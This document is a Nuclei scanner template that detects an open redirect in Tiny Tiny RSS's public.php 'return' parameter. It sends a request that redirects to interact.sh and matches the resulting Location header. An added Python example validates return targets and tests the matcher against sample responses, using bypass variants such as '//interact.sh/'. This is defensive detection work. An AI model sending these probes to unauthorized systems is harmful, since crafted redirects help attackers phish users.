Vulnerability description
Detected an open redirect vulnerability in Tiny Tiny RSS where the return parameter in public.php was abused to redirect users to an attacker-controlled external URL after the authentication flow.
id: tinytiny-rss-redirect

info:
  name: TinyTiny RSS Open Redirect
  author: DhiyaneshDk
  severity: low
  description: |
    Detected an open redirect vulnerability in Tiny Tiny RSS where the return parameter in public.php was abused to redirect users to an attacker-controlled external URL after the authentication flow.
  reference:
    - https://seclists.org/oss-sec/2019/q1/155
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"Tiny Tiny RSS"
  tags: redirect,tiny-tiny,rss

http:
  - method: GET
    path:
      - "{{BaseURL}}/public.php?return=http%3a%2f%2finteract.sh%2f&op=login&login=password=&profile=0"

    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'

      - type: status
        status:
          - 302
          - 301
# digest: 4a0a0047304502205e101f757480f1537500ee1e8b2b79b30a764bd0d217a758fae969b8d0c72ea8022100d7f0de8979044374234c4a2cca69fd21a0809959ea493f580dddd461ac3aa0f3:922c64590222798bb761d5b6d8e72950
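The following is an added example, not code from Tiny Tiny RSS and not part of the Nuclei template above. It shows the two sides of the issue the description and the template describe: first, the allow-list check a login handler should apply to a user-supplied `return` parameter so that only same-site destinations are accepted (the mitigation for this class of bug); second, the template's detection logic (a `Location` header pointing at interact.sh combined with a 301/302 status, joined by `matchers-condition: and`) applied to constructed HTTP responses so the rule can be reasoned about offline. The hostname `rss.example.org`, the function names and the sample responses are assumptions made for the example.

```python
"""Added example: safe handling of a post-login ``return`` parameter, plus
the detection logic of the Nuclei matcher above applied to sample responses.
Not part of Tiny Tiny RSS or of the template."""
import re
from urllib.parse import urlsplit

# Hypothetical host of the deployment being protected (assumption for the example).
SITE_HOST = "rss.example.org"


def is_safe_return_target(value: str, site_host: str = SITE_HOST) -> bool:
    """Return True only if ``value`` is a destination on this site.

    Rejects absolute URLs to other hosts (http://..., https://...),
    protocol-relative references (//evil), backslash variants (/\\evil,
    which many browsers treat like //evil), non-http schemes such as
    javascript:, and control characters that could split headers.
    """
    if not value or any(ch in value for ch in "\r\n\t\0"):
        # urlsplit silently strips CR/LF/TAB, so reject them before parsing.
        return False
    candidate = value.replace("\\", "/")
    try:
        parts = urlsplit(candidate)
    except ValueError:
        return False
    if parts.scheme or parts.netloc:
        # Absolute or protocol-relative URL: allow only exact same-host http(s).
        return parts.scheme in ("http", "https") and parts.netloc.lower() == site_host.lower()
    # Relative reference: a single leading slash, never "//".
    return candidate.startswith("/") and not candidate.startswith("//")


# The regex from the template's header matcher, used verbatim.
LOCATION_RE = re.compile(
    r"(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$"
)


def matches_open_redirect(status: int, raw_headers: str) -> bool:
    """Mirror ``matchers-condition: and``: both the status matcher (301/302)
    and the Location regex must match for the response to be flagged."""
    return status in (301, 302) and LOCATION_RE.search(raw_headers) is not None


# Constructed sample responses (not captured from any real server).
VULNERABLE_RESPONSE = (
    302,
    "HTTP/1.1 302 Found\r\nLocation: http://interact.sh/\r\nContent-Length: 0\r\n",
)
FIXED_RESPONSE = (
    302,
    "HTTP/1.1 302 Found\r\nLocation: /index.php\r\nContent-Length: 0\r\n",
)


if __name__ == "__main__":
    for target in ("/feeds?id=1", "http://interact.sh/", "//interact.sh/", "/\\interact.sh/"):
        print(f"return={target!r:24} allowed={is_safe_return_target(target)}")
    print("vulnerable response flagged:", matches_open_redirect(*VULNERABLE_RESPONSE))
    print("fixed response flagged:     ", matches_open_redirect(*FIXED_RESPONSE))
```

Two points worth noting when reusing this. The validator compares the whole `netloc`, so a target carrying userinfo or a non-default port (`http://rss.example.org@evil.example/`, `http://rss.example.org:8080/`) is refused rather than accepted on a partial hostname match. The header regex, read literally, is anchored on the spelling `Location` with that capitalisation, so if you lift it into other tooling that does not normalise header names, a server emitting `location:` in lowercase would not be flagged.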